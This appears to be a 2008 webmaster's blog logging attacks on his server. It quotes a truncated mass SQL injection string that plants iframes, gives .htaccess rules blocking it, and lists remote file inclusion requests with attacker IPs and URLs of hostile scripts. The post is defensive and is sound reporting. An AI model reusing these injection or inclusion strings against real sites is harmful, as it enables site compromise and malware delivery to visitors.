Aug 22, 2008

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST

The latest hack running right now is a injection atempt using a string like this.

DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C----removed----%20AS%20CHAR(4000));EXEC(@S);

This is a bot atack and is comming from everywhere.
The come in 2 at a time from the same IP.

They are trying to inject some code into your site to display a iframe that will take people to another site. It doesnt look like they are atacking PHP they are atacking ASP Cold Fusion and Perl See more here isc.sans.org

Also see this post which recomends.


RewriteCond %{REQUEST_URI} ^(.*)CAST(.*) [OR]
RewriteCond %{REQUEST_URI} ^(.*)DECLARE(.*) [NC,OR]

But a better page on how to block this by .htaccess is located here.


They are also scanning for a delay in page return so any script that sleeps when it detects a hack must have the sleep removed or they will come back and hit you harder.


Just the hits will bring you server down if you try to ban all the IPS being used so I have modified the hacker modules.

Update hacker modules Here.




You will also want to download your databases and scan them for IFRAMES and java script.

Aug 6, 2008

magnum.liquidweb.com hacker

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322)
64.91.248.2 magnum.liquidweb.com
string=[ feed=http%3A%2F%2Fchyngachanga.ru%2Fcontent%2Fwuge%2Fowofi%2F ]
hacker hits with this string trying to get my server to run his scripts.

then after geting banned keeps trying with this set of scripts.

?feed=http%3A%2F%2Fwww.qubestunes.com%2Ftreytest%2F1%2Fadoyuru%2Fzagu%2F
p=http%3A%2F%2Fwww.heaven-house.kz%2Ftemplates_c%2Fomoj%2Femuqir%2F

they all are scripts used by hackers to display a test message on your server
http://chyngachanga.ru/content/wuge/owofi/
http://www.qubestunes.com/treytest/1/adoyuru/zagu/
http://www.heaven-house.kz/templates_c/omoj/emuqir/